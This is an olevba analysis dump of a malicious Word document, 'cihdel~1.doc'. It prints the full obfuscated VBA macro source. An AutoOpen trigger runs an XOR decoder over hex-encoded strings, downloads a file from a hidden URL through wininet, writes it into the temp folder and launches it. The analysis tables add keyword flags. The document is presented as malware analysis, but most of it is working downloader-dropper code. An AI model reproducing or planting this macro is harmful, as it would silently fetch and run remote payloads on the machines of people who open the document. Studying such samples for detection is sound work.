Malicious Word macro

olevba 0.25 - http://decalage.info/python/oletools
Flags       Filename
----------- -----------------------------------------------------------------
OLE:MASIHB- cihdel~1.doc

(Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: cihdel~1.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: cihdel~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
ZasimSimZa
End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+----------+----------+---------------------------------------+
| Type     | Keyword  | Description                           |
+----------+----------+---------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
+----------+----------+---------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO OIDL8.bas
in file: cihdel~1.doc - OLE stream: u'Macros/VBA/OIDL8'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


Sub ZasimSimZa()
Dim CHEG As Integer
CHEG = 34
OLEOLEETOSLE (CHEG)

End Sub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO PIDLE0.bas
in file: cihdel~1.doc - OLE stream: u'Macros/VBA/PIDLE0'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

#If VBA7 And Win64 Then
Public Declare PtrSafe Function ETOKTOTUTPALIT4222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Public Declare PtrSafe Function ETOKTOTUTPALIT422 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Public Declare PtrSafe Function REKOMDED121 Lib "wininet.dll" Alias "InternetReadFile" (ByVal etoeshekto23333 As LongPtr, ByVal REKOMDEDEBET1 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare PtrSafe Function ETOKTOTUTPALIT4 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Public Declare Function ETOKTOTUTPALIT4222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Public Declare Function ETOKTOTUTPALIT422 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Public Declare Function REKOMDED121 Lib "wininet.dll" Alias "InternetReadFile" (ByVal etoeshekto23333 As Long, ByVal REKOMDEDEBET1 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare Function ETOKTOTUTPALIT4 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If

Public Function ZIGRIGFIG9(KUKURUKUZUKU01 As String, KUKURUKUZUKU02 As String) As String

    Dim SEREBRAAA10 As Integer
    Dim SEREBRAAA101 As Integer


    Dim UTJJTTJ As Double
For UTJJTTJ = 1 To 3
If UTJJTTJ = 32 Then End
Next UTJJTTJ

    Dim SEREBRAAA1 As Long
    Dim SEREBRAAA1O As String
    For SEREBRAAA1 = 1 _
    To _
    ( _
    LEFUNCLE1 _
    (KUKURUKUZUKU02) _
    / 2)
        SEREBRAAA10 = Val("&H" & _
        (Mid$(KUKURUKUZUKU02, _
        (2 * SEREBRAAA1) - 1, 2)))
        SEREBRAAA101 = Asc(Mid$(KUKURUKUZUKU01, _
        ((SEREBRAAA1 Mod Len(KUKURUKUZUKU01)) + 1), 1))
        SEREBRAAA1O = SEREBRAAA1O + Chr(SEREBRAAA10 Xor SEREBRAAA101)
    Next SEREBRAAA1
   ZIGRIGFIG9 = SEREBRAAA1O
End Function

Public Function LEFUNCLE1(ASASSAWWWWWWWW As String) As Integer
LEFUNCLE1 = Len(ASASSAWWWWWWWW)
End Function


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| Suspicious | Lib            | May run code from a DLL                 |
| Suspicious | Chr            | May attempt to obfuscate specific       |
|            |                | strings                                 |
| Suspicious | Xor            | May attempt to obfuscate specific       |
|            |                | strings                                 |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
| IOC        | wininet.dll    | Executable file name                    |
+------------+----------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO IDL4.bas
in file: cihdel~1.doc - OLE stream: u'Macros/VBA/IDL4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


Public Const WREGLEYSPEAR16 = "2A020E1E195A2A090219021604263D3B3B"
Public Const WREGLEYSPEAR15 = "25191F1D1C1F0241445B0E0D00"
Public Const WREGLEYSPEAR14 = "111E1F024F5B440E0502450116313C3B3021287C30377D63464B455B4B445A0E0117"
Public Const WREGLEYSPEAR13 = "2A09191B05000217155B2D1C0937072D2621373F1B303837170D"
Public Const WREGLEYSPEAR12 = "tyjkrutkyrukueRTTUURRTRRR"


Public Function ItsALOOOP2(ByRef SAAARD1 As Object) As Object
Set ItsALOOOP2 = SAAARD1.GetSpecialFolder(2)
End Function
Sub OLEOLEETOSLE(RUFRUFRUF As Long)

ZERNOAA2 ("CA_LLS_AAAL_CSL_921_29")
End Sub


#If VBA7 _
    And Win64 Then
       Public Function SomeFunct4(ByRef RUKALICO87 As LongPtr, HLOPUSHKA6 As LongPtr) As Boolean
    #Else
       Public Function SomeFunct4(ByRef RUKALICO87 As Long, HLOPUSHKA6 As Long) As Boolean
    #End If
Dim URLPURL1 As String
    URLPURL1 = ZIGRIGFIG9(WREGLEYSPEAR12, WREGLEYSPEAR14)

                RUKALICO87 _
    = ETOKTOTUTPALIT4 _
    ( _
    HLOPUSHKA6, _
    URLPURL1, vbNullString, _
    0, _
    etoeshekto2, 0)
    SomeFunct4 = True
End Function


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+-------------+-----------------------------------------+
| Type       | Keyword     | Description                             |
+------------+-------------+-----------------------------------------+
| Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
|            |             | be used to obfuscate strings (option    |
|            |             | --decode to see all)                    |
+------------+-------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO FILE6.bas
in file: cihdel~1.doc - OLE stream: u'Macros/VBA/FILE6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Public Const FIRDISHANK21 = "HeXaRGUS"


Public _
Function ZERNOAA2(PIPKLIP5 _
As _
String)
Sub1
End Function
Public Function Sub1()

Dim KIKIPORAD7392  As Object
Set KIKIPORAD7392 = CreateObject _
(ZIGRIGFIG9(WREGLEYSPEAR12, WREGLEYSPEAR13))

Dim FBRRWTEWT As Long
For FBRRWTEWT = 0 To 1
If KLALAKKSKKNNCN0 = 31 Then End
Next FBRRWTEWT
Dim ETOPART98 As Object
Set ETOPART98 = ItsALOOOP2(KIKIPORAD7392)
Dim AVAVAASSS As Double
For AVAVAASSS = 1 To 3
If AVAVAASSS = 32 Then End
Next AVAVAASSS
Dim FEWQQ23
ASDFKJF = ZIGRIGFIG9(WREGLEYSPEAR12, WREGLEYSPEAR15)
FEWQQ23 = ETOPART98 & ASDFKJF
Dim VBEESFBSSB As Integer
For VBEESFBSSB = 6 To 7
If LOOO9371003942732 = 33 Then End
Next VBEESFBSSB
Dim NGTJT563 As Integer
For NGTJT563 = 2 To 3
If NGTJT563 = 34 Then End
Next NGTJT563

If ItsALOOOP3(KIKIPORAD7392, FEWQQ23) Then
KIKIPORAD7392. _
DeleteFile FEWQQ23
End If
If FERMERPIG76(FEWQQ23) Then
End If
Set SSSS = Nothing
If ItsALOOOP3(KIKIPORAD7392, FEWQQ23) Then
End If
Set SIRDORBORMOG = CreateObject _
(ZIGRIGFIG9 _
(WREGLEYSPEAR12, WREGLEYSPEAR16))
SIRDORBORMOG.Open FEWQQ23
End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| Suspicious | CreateObject   | May create an OLE object                |
| Suspicious | Open           | May open a file                         |
| Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
|            |                | be used to obfuscate strings (option    |
|            |                | --decode to see all)                    |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
+------------+----------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO IDL3.bas
in file: cihdel~1.doc - OLE stream: u'Macros/VBA/IDL3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Public Function ItsALOOOP3(ByRef HAARD6 As Object, ByVal ASXXX3 As String) As Boolean
If HAARD6.FileExists(ASXXX3) Then
ItsALOOOP3 = True
Else
ItsALOOOP3 = False
End If
End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO A0007.bas
in file: cihdel~1.doc - OLE stream: u'Macros/VBA/A0007'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Option Explicit


Private Const VIKAPIKA1872 = 8162
Private Const VIKAPIKA1871 As String = "HAZ"
Private Const VIKAPIKA1999 = 1
Private Const etoeshekto2 = &H4000000

Public Function FERMERPIG76 _
(ByVal AHESLIBIAHESLIBI As String) As Boolean
    #If VBA7 _
    And Win64 Then
        Dim THEP9RAM8 As LongPtr, K3AK4AY5AT6O9 As LongPtr
    #Else
        Dim THEP9RAM8 As Long, K3AK4AY5AT6O9 As Long
    #End If
    Dim CDSFDFD As Long
    Dim REKOMDEDEBET1 As String * VIKAPIKA1872, POKORO4E As String
    Dim SISKAPIR721 As Integer, DLINIYPAREN As Double
    THEP9RAM8 = ETOKTOTUTPALIT422(VIKAPIKA1871, VIKAPIKA1999, vbNullString, vbNullString, 0)
    If THEP9RAM8 = 0 Then
        Exit Function
    End If
    Dim FiGaMan As Boolean

    If SomeFunct4(K3AK4AY5AT6O9, THEP9RAM8) Then
    End If
    If K3AK4AY5AT6O9 = 0 Then
        DLINIYPAREN = 0
    Else
        REKOMDED121 K3AK4AY5AT6O9, REKOMDEDEBET1, VIKAPIKA1872, CDSFDFD
        POKORO4E = REKOMDEDEBET1
        Do While CDSFDFD <> 0
            REKOMDED121 K3AK4AY5AT6O9, REKOMDEDEBET1, VIKAPIKA1872, CDSFDFD

            Dim VSSDVZAAA As Long
For VSSDVZAAA = 6 To 8
If VSSDVZAAA = 38 Then End
Next VSSDVZAAA

            POKORO4E = POKORO4E + Mid(REKOMDEDEBET1, 1, CDSFDFD)
        Loop
            DLINIYPAREN = Len(POKORO4E): SISKAPIR721 = FreeFile
        Open AHESLIBIAHESLIBI _
            For Binary Access Write _
        Lock Write _
        As #SISKAPIR721
        Put #SISKAPIR721, _
                , POKORO4E
        Dim HHHHHHHAAAAAAALLLLLLL As Double
            For HHHHHHHAAAAAAALLLLLLL = 2 To 3
    If HHHHHHHAAAAAAALLLLLLL = 37 Then End
                    Next HHHHHHHAAAAAAALLLLLLL
        Close #SISKAPIR721
    End If
    ETOKTOTUTPALIT4222 K3AK4AY5AT6O9
    ETOKTOTUTPALIT4222 THEP9RAM8
    POKORO4E = ""
    If DLINIYPAREN Then
        FERMERPIG76 = True
    End If
End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+---------+-----------------------------------------+
| Type       | Keyword | Description                             |
+------------+---------+-----------------------------------------+
| Suspicious | Open    | May open a file                         |
| Suspicious | Write   | May write to a file (if combined with   |
|            |         | Open)                                   |
| Suspicious | Put     | May write to a file (if combined with   |
|            |         | Open)                                   |
| Suspicious | Binary  | May read or write a binary file (if     |
|            |         | combined with Open)                     |
+------------+---------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO UserForm1.frm
in file: cihdel~1.doc - OLE stream: u'Macros/VBA/UserForm1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO UserForm2.frm
in file: cihdel~1.doc - OLE stream: u'Macros/VBA/UserForm2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO UserForm3.frm
in file: cihdel~1.doc - OLE stream: u'Macros/VBA/UserForm3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)